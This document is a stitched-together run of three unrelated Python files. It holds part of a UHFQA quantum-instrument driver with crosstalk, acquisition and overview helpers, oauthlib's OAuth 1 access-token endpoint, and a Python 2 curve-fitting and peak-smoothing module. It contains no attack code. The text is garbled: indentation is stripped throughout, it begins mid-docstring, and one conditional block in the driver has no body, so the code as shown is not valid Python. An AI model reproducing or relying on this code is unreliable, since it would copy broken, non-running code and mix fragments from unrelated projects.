This method uses the 'qas_0_crosstalk_rows_*_cols_*' nodes.
"""
for i in range(np.shape(matrix)[0]): # looping over the rows
            for j in range(np.shape(matrix)[1]):  # looping over the columns
self.set('qas_0_crosstalk_rows_{}_cols_{}'.format(
j, i), matrix[i][j])
def download_crosstalk_matrix(self, nr_rows=10, nr_cols=10):
"""
        Download the parameters of the 10*10 crosstalk suppression matrix.
This method uses the 'qas_0_crosstalk_rows_*_cols_*' nodes.
"""
matrix = np.zeros([nr_rows, nr_cols])
for i in range(np.shape(matrix)[0]): # looping over the rows
            for j in range(np.shape(matrix)[1]):  # looping over the columns
matrix[i][j] = self.get(
'qas_0_crosstalk_rows_{}_cols_{}'.format(j, i))
return matrix
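    # Usage sketch (illustrative only; 'uhf' stands for an already connected
    # instance of this driver and is an assumption, not defined in this file):
    #   uhf.upload_crosstalk_matrix(np.eye(10))   # identity matrix, i.e. no crosstalk correction
    #   m = uhf.download_crosstalk_matrix()       # read the 10x10 matrix back from the device
    #   assert np.allclose(m, np.eye(10))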
##########################################################################
# 'public' functions: print overview helpers
##########################################################################
def print_correlation_overview(self) -> None:
msg = '\tCorrelations overview \n'
for i in range(10):
enabled = self.get('qas_0_correlations_{}_enable'.format(i))
source = self.get('qas_0_correlations_{}_source'.format(i))
msg += "Correlations {}, enabled: {} \tsource: {}\n".format(
i, enabled, source)
msg += '\n\tThresholded correlations overview \n'
for i in range(10):
enabled = self.get(
'qas_0_thresholds_{}_correlation_enable'.format(i))
source = self.get(
'qas_0_thresholds_{}_correlation_source'.format(i))
msg += "Thresholds correlation {}, enabled: {} \tsource: {}\n".format(
i, enabled, source)
print(msg)
def print_deskew_overview(self) -> None:
msg = '\tDeskew overview \n'
deskew_mat = np.zeros((2, 2))
for i in range(2):
for j in range(2):
deskew_mat[i, j] = self.get(
'qas_0_deskew_rows_{}_cols_{}'.format(i, j))
msg += 'Deskew matrix: \n'
msg += str(deskew_mat)
print(msg)
def print_crosstalk_overview(self) -> None:
msg = '\tCrosstalk overview \n'
msg += 'Bypass crosstalk: {} \n'.format(self.qas_0_crosstalk_bypass())
crosstalk_mat = np.zeros((10, 10))
for i in range(10):
for j in range(10):
crosstalk_mat[i, j] = self.get(
'qas_0_crosstalk_rows_{}_cols_{}'.format(i, j))
msg += 'Crosstalk matrix: \n'
print(msg)
print(crosstalk_mat)
def print_integration_overview(self) -> None:
msg = '\tIntegration overview \n'
msg += 'Integration mode: {} \n'.format(
self.qas_0_integration_mode())
for i in range(10):
msg += 'Integration source {}: {}\n'.format(
i, self.get('qas_0_integration_sources_{}'.format(i)))
print(msg)
def print_rotations_overview(self) -> None:
msg = '\tRotations overview \n'
for i in range(10):
msg += 'Rotations {}: {}\n'.format(
i, self.get('qas_0_rotations_{}'.format(i)))
print(msg)
def print_thresholds_overview(self) -> None:
msg = '\t Thresholds overview \n'
for i in range(10):
msg += 'Threshold {}: {}\n'.format(
i, self.get('qas_0_thresholds_{}_level'.format(i)))
print(msg)
def print_user_regs_overview(self) -> None:
msg = '\t User registers overview \n'
user_reg_funcs = ['']*16
user_reg_funcs[0] = 'Loop count'
user_reg_funcs[1] = 'Readout mode'
user_reg_funcs[2] = 'Wait delay'
user_reg_funcs[3] = 'Average count'
user_reg_funcs[4] = 'Error count'
for i in range(16):
msg += 'User reg {}: \t{}\t({})\n'.format(
i, self.get('awgs_0_userregs_{}'.format(i)), user_reg_funcs[i])
print(msg)
def print_overview(self) -> None:
"""
Print a readable overview of relevant parameters of the UHFQC.
N.B. This overview is not complete, but combines different
print helpers
"""
self.print_correlation_overview()
self.print_crosstalk_overview()
self.print_deskew_overview()
self.print_integration_overview()
self.print_rotations_overview()
self.print_thresholds_overview()
self.print_user_regs_overview()
##########################################################################
# 'public' functions: acquisition support
##########################################################################
def acquisition(self,
samples=100,
averages=1,
acquisition_time=0.010,
timeout=10,
channels=(0, 1),
mode='rl',
poll=True):
self.timeout(timeout)
        self.acquisition_initialize(samples, averages, channels=channels, mode=mode, poll=poll)
if poll:
data = self.acquisition_poll(samples, True, acquisition_time)
else:
data = self.acquisition_get(samples, True, acquisition_time)
self.acquisition_finalize()
return data
def acquisition_initialize(self,
samples,
averages,
loop_cnt = None,
channels=(0, 1),
mode='rl',
poll=True) -> None:
# Define the channels to use and subscribe to them
self._acquisition_nodes = []
# Loop counter of AWG
if loop_cnt is None:
loop_cnt = samples
# Make some checks on the configured AWG program
if samples > 1 and not self._awg_program_features['loop_cnt']:
raise ziUHFQCSeqCError(
'Trying to acquire {} samples using an AWG program that does not use \'loop_cnt\'.'.format(samples))
if averages > 1 and not self._awg_program_features['avg_cnt']:
# Adjust the AWG loop counter according to the configured program
loop_cnt *= averages
if mode == 'rl':
for c in channels:
path = self._get_full_path(
'qas/0/result/data/{}/wave'.format(c))
self._acquisition_nodes.append(path)
if poll:
self.subs(path)
# Enable automatic readout
self.qas_0_result_reset(1)
self.qas_0_result_enable(1)
self.qas_0_result_length(samples)
self.qas_0_result_averages(averages)
ro_mode = 0
else:
for c in channels:
path = self._get_full_path(
'qas/0/monitor/inputs/{}/wave'.format(c))
self._acquisition_nodes.append(path)
if poll:
self.subs(path)
# Enable automatic readout
self.qas_0_monitor_reset(1)
self.qas_0_monitor_enable(1)
self.qas_0_monitor_length(samples)
self.qas_0_monitor_averages(averages)
ro_mode = 1
self.set('awgs_0_userregs_{}'.format(UHFQA_core.USER_REG_LOOP_CNT), loop_cnt)
self.set('awgs_0_userregs_{}'.format(UHFQA_core.USER_REG_RO_MODE), ro_mode)
self.set('awgs_0_userregs_{}'.format(UHFQA_core.USER_REG_AVG_CNT), averages)
if self.wait_dly() > 0 and not self._awg_program_features['wait_dly']:
raise ziUHFQCSeqCError(
'Trying to use a delay of {} using an AWG program that does not use \'wait_dly\'.'.format(self.wait_dly()))
self.set('awgs_0_userregs_{}'.format(UHFQA_core.USER_REG_WAIT_DLY), self.wait_dly())
if poll:
self.subs(self._get_full_path('auxins/0/sample'))
# Generate more dummy data
self.auxins_0_averaging(8)
def acquisition_arm(self, single=True) -> None:
# time.sleep(0.01)
self.awgs_0_single(single)
self.start()
def acquisition_poll(self, samples, arm=True,
acquisition_time=0.010):
"""
Polls the UHFQC for data.
Args:
samples (int): the expected number of samples
arm (bool): if true arms the acquisition, disable when you
need synchronous acquisition with some external dev
acquisition_time (float): time in sec between polls
            Note: the overall timeout is taken from the instrument's 'timeout'
                parameter; a TimeoutError is raised if not all samples arrive in time.
"""
data = {k: [] for k, dummy in enumerate(self._acquisition_nodes)}
# Start acquisition
if arm:
self.acquisition_arm()
# Acquire data
gotem = [False]*len(self._acquisition_nodes)
accumulated_time = 0
while accumulated_time < self.timeout() and not all(gotem):
dataset = self.poll(acquisition_time)
# Enable the user to interrupt long (or buggy) acquisitions
try:
check_keyboard_interrupt()
except KeyboardInterrupt as e:
# Finalize acquisition before raising exception
self.acquisition_finalize()
raise e
for n, p in enumerate(self._acquisition_nodes):
if p in dataset:
for v in dataset[p]:
data[n] = np.concatenate((data[n], v['vector']))
if len(data[n]) >= samples:
gotem[n] = True
accumulated_time += acquisition_time
if not all(gotem):
self.acquisition_finalize()
for n, _c in enumerate(self._acquisition_nodes):
if n in data:
print("\t: Channel {}: Got {} of {} samples".format(
n, len(data[n]), samples))
raise TimeoutError("Error: Didn't get all results!")
return data
def acquisition_get(self, samples, arm=True,
acquisition_time=0.010):
"""
Waits for the UHFQC to finish a measurement then reads the data.
Args:
samples (int): the expected number of samples
arm (bool): if true arms the acquisition, disable when you
need synchronous acquisition with some external dev
acquisition_time (float): time in sec between polls
            Note: the overall timeout is taken from the instrument's 'timeout'
                parameter; a TimeoutError is raised if the sequencer does not finish in time.
"""
data = {n: [] for n in range(len(self._acquisition_nodes))}
# Start acquisition
if arm:
self.acquisition_arm()
self.sync()
done = False
start = time.time()
while (time.time()-start) < self.timeout():
status = self.getdeep('awgs/0/sequencer/status')
if status['value'][0] == 0:
done = True
break
if not done:
self.acquisition_finalize()
raise TimeoutError("Error: Didn't get all results!")
gotem = [False for _ in range(len(self._acquisition_nodes))]
for n, p in enumerate(self._acquisition_nodes):
data[n] = self.getv(p)
if len(data[n]) >= samples:
gotem[n] = True
if not all(gotem):
for n in data.keys():
print("\t: Channel {}: Got {} of {} samples".format(
n, len(data[n]), samples))
raise TimeoutError("Error: Didn't get all results!")
return data
def acquisition_finalize(self) -> None:
self.stop()
self.unsubs()
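    # Acquisition flow sketch (illustrative only; 'uhf' is an assumed, already
    # connected driver instance, and an AWG program supporting 'loop_cnt' is
    # assumed to be uploaded):
    #   uhf.acquisition_initialize(samples=256, averages=1, channels=(0, 1), mode='rl')
    #   data = uhf.acquisition_poll(samples=256)  # arms the AWG and returns {channel index: np.array}
    #   uhf.acquisition_finalize()                # stops the AWG and unsubscribes from the result nodes
    # The 'acquisition()' convenience method above performs these steps in a single call.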
##########################################################################
# Private methods
##########################################################################
def _reset_awg_program_features(self) -> None:
"""
Resets the self._awg_program_features to disable all features. The UHFQC can be configured with a number
of application-specific AWG programs using this driver. However, all the programs share some characteristics that
are described in the _awg_program_features dictionary. For example, all of the programs include a main loop
that runs for a number of iterations given by a user register. This feature is indicated by the 'loop_cnt'
item in the dictionary. In contrast, not all program include an extra loop for the number of averages that
should be done. Therefore, the 'awg_cnt' item in the dictionary is not automatically set. The driver
uses these features to keep track of what the current AWG program can do. It then raises errors in case
the user tries to do something that is not supported.
"""
self._awg_program_features = {
'loop_cnt': False,
'avg_cnt': False,
'wait_dly': False,
'waves': False,
'cases': False,
'diocws': False}
def _get_minimum_holdoff(self):
if self.qas_0_result_averages() == 1:
holdoff = np.max((800, self.qas_0_integration_length(), self.qas_0_delay()+16))/self.clock_freq()
else:
holdoff = np.max((2560, self.qas_0_integration_length(), self.qas_0_delay()+16))/self.clock_freq()
return holdoff
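    # Worked example (illustrative): with result averaging enabled (averages > 1),
    # qas_0_integration_length() == 4096 samples and qas_0_delay() == 0, the
    # minimum hold-off is max(2560, 4096, 0 + 16) / 1.8e9 ~= 2.28 us between readouts.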
def _set_wait_dly(self, value) -> None:
self.set('awgs_0_userregs_{}'.format(UHFQA_core.USER_REG_WAIT_DLY), value)
def _get_wait_dly(self):
return self.get('awgs_0_userregs_{}'.format(UHFQA_core.USER_REG_WAIT_DLY))
|
|
# -*- coding: utf-8 -*-
"""
oauthlib.oauth1.rfc5849.endpoints.access_token
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This module is an implementation of the access token provider logic of
OAuth 1.0 RFC 5849. It validates the correctness of access token requests,
creates and persists tokens as well as create the proper response to be
returned to the client.
"""
import logging
from oauthlib.common import urlencode
from .. import errors
from .base import BaseEndpoint
log = logging.getLogger(__name__)
class AccessTokenEndpoint(BaseEndpoint):
"""An endpoint responsible for providing OAuth 1 access tokens.
Typical use is to instantiate with a request validator and invoke the
``create_access_token_response`` from a view function. The tuple returned
has all information necessary (body, status, headers) to quickly form
and return a proper response. See :doc:`/oauth1/validator` for details on which
validator methods to implement for this endpoint.
"""
def create_access_token(self, request, credentials):
"""Create and save a new access token.
Similar to OAuth 2, indication of granted scopes will be included as a
space separated list in ``oauth_authorized_realms``.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:returns: The token as an urlencoded string.
"""
request.realms = self.request_validator.get_realms(
request.resource_owner_key, request)
token = {
'oauth_token': self.token_generator(),
'oauth_token_secret': self.token_generator(),
# Backport the authorized scopes indication used in OAuth2
'oauth_authorized_realms': ' '.join(request.realms)
}
token.update(credentials)
self.request_validator.save_access_token(token, request)
return urlencode(token.items())
def create_access_token_response(self, uri, http_method='GET', body=None,
headers=None, credentials=None):
"""Create an access token response, with a new request token if valid.
:param uri: The full URI of the token request.
:param http_method: A valid HTTP verb, i.e. GET, POST, PUT, HEAD, etc.
:param body: The request body as a string.
:param headers: The request headers as a dict.
:param credentials: A list of extra credentials to include in the token.
:returns: A tuple of 3 elements.
1. A dict of headers to set on the response.
2. The response body as a string.
3. The response status code as an integer.
An example of a valid request::
>>> from your_validator import your_validator
>>> from oauthlib.oauth1 import AccessTokenEndpoint
>>> endpoint = AccessTokenEndpoint(your_validator)
>>> h, b, s = endpoint.create_access_token_response(
... 'https://your.provider/access_token?foo=bar',
... headers={
... 'Authorization': 'OAuth oauth_token=234lsdkf....'
... },
... credentials={
... 'my_specific': 'argument',
... })
>>> h
{'Content-Type': 'application/x-www-form-urlencoded'}
>>> b
'oauth_token=lsdkfol23w54jlksdef&oauth_token_secret=qwe089234lkjsdf&oauth_authorized_realms=movies+pics&my_specific=argument'
>>> s
200
        A response to an invalid request would have a different body and status::
>>> b
'error=invalid_request&description=missing+resource+owner+key'
>>> s
400
        The same goes for an unauthorized request::
>>> b
''
>>> s
401
"""
resp_headers = {'Content-Type': 'application/x-www-form-urlencoded'}
try:
request = self._create_request(uri, http_method, body, headers)
valid, processed_request = self.validate_access_token_request(
request)
if valid:
token = self.create_access_token(request, credentials or {})
self.request_validator.invalidate_request_token(
request.client_key,
request.resource_owner_key,
request)
return resp_headers, token, 200
else:
return {}, None, 401
except errors.OAuth1Error as e:
return resp_headers, e.urlencoded, e.status_code
def validate_access_token_request(self, request):
"""Validate an access token request.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:raises: OAuth1Error if the request is invalid.
:returns: A tuple of 2 elements.
1. The validation result (True or False).
2. The request object.
"""
self._check_transport_security(request)
self._check_mandatory_parameters(request)
if not request.resource_owner_key:
raise errors.InvalidRequestError(
description='Missing resource owner.')
if not self.request_validator.check_request_token(
request.resource_owner_key):
raise errors.InvalidRequestError(
description='Invalid resource owner key format.')
if not request.verifier:
raise errors.InvalidRequestError(
description='Missing verifier.')
if not self.request_validator.check_verifier(request.verifier):
raise errors.InvalidRequestError(
description='Invalid verifier format.')
if not self.request_validator.validate_timestamp_and_nonce(
request.client_key, request.timestamp, request.nonce, request,
request_token=request.resource_owner_key):
return False, request
# The server SHOULD return a 401 (Unauthorized) status code when
# receiving a request with invalid client credentials.
# Note: This is postponed in order to avoid timing attacks, instead
# a dummy client is assigned and used to maintain near constant
# time request verification.
#
# Note that early exit would enable client enumeration
valid_client = self.request_validator.validate_client_key(
request.client_key, request)
if not valid_client:
request.client_key = self.request_validator.dummy_client
# The server SHOULD return a 401 (Unauthorized) status code when
# receiving a request with invalid or expired token.
# Note: This is postponed in order to avoid timing attacks, instead
# a dummy token is assigned and used to maintain near constant
# time request verification.
#
# Note that early exit would enable resource owner enumeration
valid_resource_owner = self.request_validator.validate_request_token(
request.client_key, request.resource_owner_key, request)
if not valid_resource_owner:
request.resource_owner_key = self.request_validator.dummy_request_token
# The server MUST verify (Section 3.2) the validity of the request,
# ensure that the resource owner has authorized the provisioning of
# token credentials to the client, and ensure that the temporary
# credentials have not expired or been used before. The server MUST
# also verify the verification code received from the client.
# .. _`Section 3.2`: https://tools.ietf.org/html/rfc5849#section-3.2
#
# Note that early exit would enable resource owner authorization
# verifier enumertion.
valid_verifier = self.request_validator.validate_verifier(
request.client_key,
request.resource_owner_key,
request.verifier,
request)
valid_signature = self._check_signature(request, is_token_request=True)
# log the results to the validator_log
# this lets us handle internal reporting and analysis
request.validator_log['client'] = valid_client
request.validator_log['resource_owner'] = valid_resource_owner
request.validator_log['verifier'] = valid_verifier
request.validator_log['signature'] = valid_signature
# We delay checking validity until the very end, using dummy values for
# calculations and fetching secrets/keys to ensure the flow of every
# request remains almost identical regardless of whether valid values
# have been supplied. This ensures near constant time execution and
# prevents malicious users from guessing sensitive information
v = all((valid_client, valid_resource_owner, valid_verifier,
valid_signature))
if not v:
log.info("[Failure] request verification failed.")
log.info("Valid client:, %s", valid_client)
log.info("Valid token:, %s", valid_resource_owner)
log.info("Valid verifier:, %s", valid_verifier)
log.info("Valid signature:, %s", valid_signature)
return v, request
|
|
import numpy, scipy, scipy.optimize, scipy.interpolate
import h5py
import os, os.path, time, copy
from PnSC_ui import *
#def ndiv(x, nptsoneside=20):
# nptsoneside=max(nptsoneside, 2.)
# gapptsoneside=min(gapptsoneside, nptsoneside-2.)
# for gap in range(gapptsoneside+1):
# starti=numpy.uint32([max(i-(nptsoneside-gap), 0) for i in range(len(arr))])
# stopi=numpy.uint32([min(i+(nptsoneside-gap)+1, len(arr)) for i in range(len(arr))])
# #print [numpy.append(arr[i0:i], arr[i+1:i1]) for i, i0, i1 in zip(range(len(arr)), starti, stopi)][8]
# #print [(((numpy.append(arr[i0:i], arr[i+1:i1]).mean()-arr[i]))**2, (numpy.append(arr[i0:i], arr[i+1:i1]).std()*nsig)**2) for i, i0, i1 in zip(range(len(arr)), starti, stopi)][8]
# arr=numpy.array([(((numpy.append(arr[i0:i], arr[i+1:i1]).mean()-arr[i]))**2<(numpy.append(arr[i0:i], arr[i+1:i1]).std()*nsig)**2 and (arr[i],) or (numpy.append(arr[i0:i], arr[i+1:i1]).mean(),))[0] for i, i0, i1 in zip(range(len(arr)), starti, stopi)], dtype=arr.dtype)
# return arr
def concat_extrap_ends(x, npts, polyorder=1, lowside=True, highside=True):
i=numpy.arange(npts, dtype='float64')
if lowside:
ans=scipy.polyfit(-1*(i+1.), x[:npts], polyorder)
x=numpy.concatenate([scipy.polyval(list(ans), i[::-1]), x])
if highside:
ans=scipy.polyfit(-1*(i[::-1]-1.), x[-1*npts:], polyorder)
x=numpy.concatenate([x, scipy.polyval(list(ans), i)])
return x
def lininterpbetweenregularpoints(existy, interval):
existy=numpy.array(existy)
x=numpy.arange(interval,dtype='float32')/interval
diff=existy[1:]-existy[:-1]
o=numpy.outer(diff,x)
return numpy.concatenate([arr+start for arr,start in zip(o,existy[:-1])]+[existy[-1:]])
def interpwithinarr(existind, existy, order=3, interpplotax=None, interpcols=['k', 'r']):
if order==1:
existind=numpy.array(existind)
diff=existind[1:]-existind[:-1]
if numpy.all(diff==diff[0]):
return lininterpbetweenregularpoints(existy, diff[0])
interind=sorted(list(set(numpy.arange(max(existind)+1))-set(existind)))
yfull=numpy.zeros(max(existind)+1, existy.dtype)
yfull[existind]=existy[:]
yfull[interind]=scipy.interpolate.spline(existind, existy, interind, order=order)
if not interpplotax is None:
interpplotax.plot(existind, existy, interpcols[0])
interpplotax.plot(interind, yfull[interind], interpcols[1])
return yfull
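#usage sketch for interpwithinarr (illustrative only; relies on the legacy
#scipy.interpolate.spline used above being available):
#   existind=numpy.arange(0, 100, 10)
#   existy=numpy.float32(existind)**0.5
#   yfull=interpwithinarr(existind, existy, order=3)   #len(yfull)==91, known points preserved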
def savgolsmooth(x, nptsoneside=7, order = 4, dx=1.0, deriv=0, binprior=0): #based on scipy cookbook. x is 1-d array, window is the number of points used to smooth the data, order is the order of the smoothing polynomial, will return the smoothed "deriv"th derivative of x
if nptsoneside<=1:
return x
if binprior>1:
origlen=len(x)
x=numpy.array([x[i*binprior:(i+1)*binprior].mean() for i in range(origlen//binprior)])
dx*=binprior
side=numpy.uint16(max(nptsoneside, numpy.ceil(order/2.)))
s=numpy.r_[2*x[0]-x[side:0:-1],x,2*x[-1]-x[-2:-1*side-2:-1]]
# a second order polynomal has 3 coefficients
b = numpy.mat([[k**i for i in range(order+1)] for k in range(-1*side, side+1)])
    m = numpy.linalg.pinv(b).A[deriv] #the deriv-th row of the base array (.A) of the pseudoinverse of b, i.e. the filter coefficients for the deriv-th derivative
# precompute the offset values for better performance
offsets = range(-1*side, side+1)
offset_data = zip(offsets, m)
smooth_data=[numpy.array([(weight * s[i + offset]) for offset, weight in offset_data]).sum() for i in xrange(side, len(s) - side)]
smooth_data=numpy.array(smooth_data)/(dx**deriv)
if binprior>1:
ia=numpy.arange(binprior, dtype='float32')/binprior
xr=numpy.concatenate([ia*(b-a)+a for a, b in zip(smooth_data[:-1], smooth_data[1:])])
xr=numpy.concatenate([(smooth_data[1]-smooth_data[0])*ia[:binprior//2]+smooth_data[0], xr, (smooth_data[-1]-smooth_data[-2])*ia[:binprior//2]+smooth_data[-1]])
smooth_data=numpy.concatenate([xr, (smooth_data[-1]-smooth_data[-2])*ia[:origlen-len(xr)]+smooth_data[-1]])
return smooth_data
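#usage sketch for savgolsmooth (illustrative only; values chosen arbitrarily):
#   t=numpy.linspace(0., 2.*numpy.pi, 500)
#   noisy=numpy.sin(t)+numpy.random.normal(0., 0.05, t.shape)
#   smoothed=savgolsmooth(noisy, nptsoneside=10, order=3, deriv=0)
#   firstder=savgolsmooth(noisy, nptsoneside=10, order=3, dx=t[1]-t[0], deriv=1)  #approximately cos(t)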
class fitfcns: #datatuples are x1,x2,...,y
#.finalparams .sigmas .parnames useful, returns fitfcn(x)
def genfit(self, fcn, initparams, datatuple, markstr='unspecified', parnames=[], interaction=0, maxfev=2000, weights=None, optimizerfcn=None):
self.maxfev=maxfev
self.performfit=True
self.initparams=initparams
self.sigmas=scipy.zeros(len(initparams))
self.parnames=parnames
self.finalparams=initparams
self.error=False
if weights is None:
def wts(x):
return 1.
elif weights=='parabolic':
a=(datatuple[0][0]+datatuple[0][-1])/2.0
b=(datatuple[0][-1]-datatuple[0][0])/2.0
def wts(x):
return 1.0+((x-a)/b)**2
def res1(p, x1, y):
return (y-fcn(p, x1))*wts(x1)
def res2(p, x1,x2,y):
return y-fcn(p, x1, x2)
def res3(p, x1,x2,x3, y):
return y-fcn(p, x1, x2, x3)
def res4(p, x1,x2,x3,x4, y):
return y-fcn(p, x1, x2, x3, x4)
resdic={1:res1, 2:res2, 3:res3, 4:res4}
self.resfcn=resdic[len(datatuple)-1]
i=0
for arr in datatuple: #if the numerical data is given as a list or tuple then convert to arrays. regardless convert to float64 because leastsq REQUIRES THIS
datatuple=datatuple[0:i]+tuple([numpy.float64(arr)])+datatuple[i+1:]
i=i+1
while self.performfit:
self.sigmas=scipy.zeros(len(self.finalparams))
if not optimizerfcn is None:
try:
self.finalparams=optimizerfcn(self.resfcn,self.initparams, args=datatuple, maxfun=self.maxfev, xtol=1.e-10, ftol=1.e-10)
self.error=0
except:
self.error=1
else:
fitout = scipy.optimize.leastsq(self.resfcn,self.initparams, args=datatuple, maxfev=self.maxfev, full_output=1)#, warning=False)
self.performfit=False
self.finalparams=fitout[0]
if not fitout[4] in [1, 2]:
print 'Fitting Error ', fitout[4], ' at ', markstr,': ', fitout[3]
self.error=True
else:
#self.finalparams=fitout[0]
self.covmat=fitout[1]
try:
self.sigmas=scipy.array([self.covmat[i, i] for i in range(len(self.sigmas))])
except:
pass
def fitfcn(x):
return fcn(self.finalparams, x)
return fitfcn
def poly(self, p, x):#both must be numpy arrays
return numpy.array([p[i]*(x**i) for i in range(p.size)]).sum(0)
def polyfit(self, datatuple, initparams, markstr='unspecified', interaction=0, maxfev=2000, weights=None):
#initparams can be an array of coefficients [constant,lin term, quad term,...] or an integer indicating the order of the polynomial
if isinstance(initparams, int):
initparams=numpy.ones(initparams+1)
else:
initparams=numpy.float64(initparams)
parnames=[]
i=0
for par in initparams:
parnames+=[''.join(('coef', `i`))]
i+=1
return self.genfit(self.poly, initparams, datatuple, markstr, parnames, interaction, maxfev, weights=weights)
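    #usage sketch for polyfit (illustrative only; exact values depend on the fit):
    #   ff=fitfcns()
    #   x=numpy.linspace(0., 10., 50)
    #   y=2.+3.*x+0.1*x**2
    #   fitfcn=ff.polyfit((x, y), 2)   #2 -> fit a second-order polynomial
    #   ff.finalparams                 #approximately [2., 3., 0.1]
    #   fitfcn(5.)                     #evaluate the fitted polynomial at x=5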
def gaussianfit(self, datatuple, initparams=scipy.array([1, 0, 1]), markstr='unspecified', interaction=0, showplot=True, maxfev=2000, weights=None):
return self.genfit(self.gaussian, initparams, datatuple, markstr, parnames=['coef', 'center', 'sigma'], interaction=interaction, maxfev=maxfev, weights=weights)
def gaussian(self, p, x):
return p[0]*scipy.exp(-0.5*((x-p[1])/p[2])**2)
def lorentzianfit(self, datatuple, initparams=scipy.array([1, 0, 1]), markstr='unspecified', interaction=0, showplot=True, maxfev=2000, weights=None):
        return self.genfit(self.lorentzian, initparams, datatuple, markstr, parnames=['coef', 'center', 'gamma'], interaction=interaction, maxfev=maxfev, weights=weights)
def lorentzian(self, p, x):
return (p[0]/scipy.pi)*p[2]/((x-p[1])**2+p[2]**2)
def Gaussian(pars, x):
return pars[2]*numpy.exp(-0.5*((x-pars[0])/pars[1])**2)
def Lorentzian(pars, x):#defined in nontraditional way so that pars[2] is the peak height
return pars[2]/(1+((x-pars[0])/pars[1])**2)
def GaussLorentz(pars, x):
gw=min(max(pars[3], 0.), 1.)
return gw*Gaussian(pars, x)+(1.-gw)*Lorentzian(pars, x)
def GaussHalfLorentz(pars, x):
return .5*Gaussian(pars, x)+.5*Lorentzian(pars, x)
PeakFcnLibrary={'Gaussian':Gaussian, 'Lorentzian':Lorentzian, 'GaussHalfLorentz':GaussHalfLorentz}
def fitpeakset(X, Y, initpars, peakfcn, negpeaks=True, optimizerfcn=None, nsigcut=3.):#peak function must be a function that accepts a list of 3 parameters (the reshape 3 needs to be changed if num params differs)
numgauss=len(initpars)
if numgauss==0:
return (numpy.float32([]), numpy.float32([]), 0.)
if nsigcut is None:
imin=0
imax=len(X)
else:
xmin=initpars[0][0]
xmax=initpars[0][0]
for p, w, h in initpars:
xmin=min(xmin, p-w*nsigcut)
xmax=max(xmax, p+w*nsigcut)
imin=numpy.argmin((X-xmin)**2)
imax=numpy.argmin((X-xmax)**2)
zeroedpeakinds=[]
repeatwithpkremoved=True #peaks are removed if their fitted height is <0. At the end, these peaks are added to the fit parameter list with 0 height and 0 error
while repeatwithpkremoved:
initparscpy=copy.copy(list(initpars))
        for pkind in reversed(zeroedpeakinds):#reverse so pop gets the right index
initparscpy.pop(pkind)
if len(initparscpy)==0:
break
initparsflat=numpy.float64(initparscpy).flatten()
def fitfcn(p, x):
allpars=numpy.reshape(p, (p.size//initpars.shape[1], initpars.shape[1]))
if isinstance(x, numpy.ndarray):
val=numpy.zeros(x.size, dtype='float32')
else:
val=0.0
for pars in allpars:
val+=peakfcn(pars, x)
return val
# def residfcn(p, x, y):
# err=y-fitfcn(p, x)
# return err
Ya=numpy.float64(Y[imin:imax])
Xa=numpy.float64(X[imin:imax])
#if not optimizerfcn is None:
ff=fitfcns()
ff.genfit(fitfcn, initparsflat, (Xa, Ya), optimizerfcn=optimizerfcn)
finalparams=ff.finalparams
# else:
# fitout=scipy.optimize.leastsq(residfcn, initparsflat, args=(X, Y), full_output=1)
# if not (fitout[4] in [1, 2]):
# print 'Fitting Error', fitout[4],': ', fitout[3]
# finalparams=numpy.float32(fitout[0])
finalparamsshaped=numpy.reshape(finalparams, (len(finalparams)//initpars.shape[1], initpars.shape[1]))
if negpeaks:
repeatwithpkremoved=False
else:
negpeakinds=numpy.where(finalparamsshaped[:, 2]<0)[0]
zeroedpeakinds+=list(negpeakinds)
zeroedpeakinds.sort()
repeatwithpkremoved=len(negpeakinds)>0
# print '^^^^^^^^^^^^^^^'
# print initparsflat
# print finalparamsshaped
# pylab.plot(X, Y, 'b.')
# pylab.show()
# if not (fitout[1] is None):
# covmat=fitout[1]
# sigmas=numpy.float32([covmat[i, i] for i in range(len(finalparams))])
# else:
# print 'COVARIANCE NOT CALCULATED:', fitout[4],': ', fitout[3]
# sigmas=numpy.zeros(len(finalparams), dtype='float32')
sigmas=ff.sigmas
finalresid=numpy.sqrt((ff.resfcn(finalparams, X, Y)**2).sum())
#pylab.plot(X, Y, 'k.', X, fitfcn(finalparams, X), 'r-')
sigmashaped=numpy.reshape(sigmas, (len(finalparams)//initpars.shape[1], initpars.shape[1]))
for pkind in zeroedpeakinds:
finalparamsshaped=list(finalparamsshaped)
sigmashaped=list(sigmashaped)
temp=copy.copy(initpars[pkind][:])
temp[2]=0.#zero the height
finalparamsshaped.insert(pkind, temp)
sigmashaped.insert(pkind, numpy.zeros(initpars.shape[1], dtype='float64'))
finalparamsshaped=numpy.float64(finalparamsshaped)
sigmashaped=numpy.float64(sigmashaped)
return (finalparamsshaped, sigmashaped, finalresid)
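#usage sketch for fitpeakset (illustrative only; each initpars row is [center, width, height]):
#   X=numpy.linspace(-5., 5., 400)
#   Y=Gaussian([0., 1., 10.], X)+Gaussian([2., 0.5, 5.], X)
#   initpars=numpy.float64([[0.2, 1.2, 8.], [1.8, 0.6, 4.]])
#   pars, sigs, resid=fitpeakset(X, Y, initpars, PeakFcnLibrary['Gaussian'])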
def arrayzeroind1d(arr, postoneg=False, negtopos=True):
sarr=numpy.sign(arr)
if postoneg:
zeroind=numpy.where(sarr[:-1]>sarr[1:])[0]
if negtopos:
zeroind=numpy.append(zeroind, numpy.where(sarr[:-1]*sarr[1:]<=0)[0])
else:#assume that if not postoneg then negtopos
zeroind=numpy.where(sarr[:-1]*sarr[1:]<=0)[0]
    return (1.0*zeroind*arr[(zeroind+1,)]-(zeroind+1)*arr[(zeroind,)])/(arr[(zeroind+1,)]-arr[(zeroind,)]) #returns array of the floating point "index" linear interpolation between 2 indices
def clustercoordsbymax1d(arr, pkind, critsepind):#results will be sorted. wherever peak indices are too close together, the peak index next to the peak index with the highest arr value gets removed
pkind.sort()
indindslow=numpy.where((pkind[1:]-pkind[:-1])<critsepind)[0]
indindshigh=indindslow+1
while indindslow.size>0:
maxindindindlow=numpy.nanargmax(arr[pkind[(indindslow,)]])
maxindindindhigh=numpy.nanargmax(arr[pkind[(indindshigh,)]])
if arr[pkind[indindslow[maxindindindlow]]]>arr[pkind[indindshigh[maxindindindhigh]]]:
pkind=numpy.delete(pkind, indindshigh[maxindindindlow])
else:
pkind=numpy.delete(pkind, indindslow[maxindindindhigh])
indindslow=numpy.where((pkind[1:]-pkind[:-1])<critsepind)[0]
indindshigh=indindslow+1
return pkind
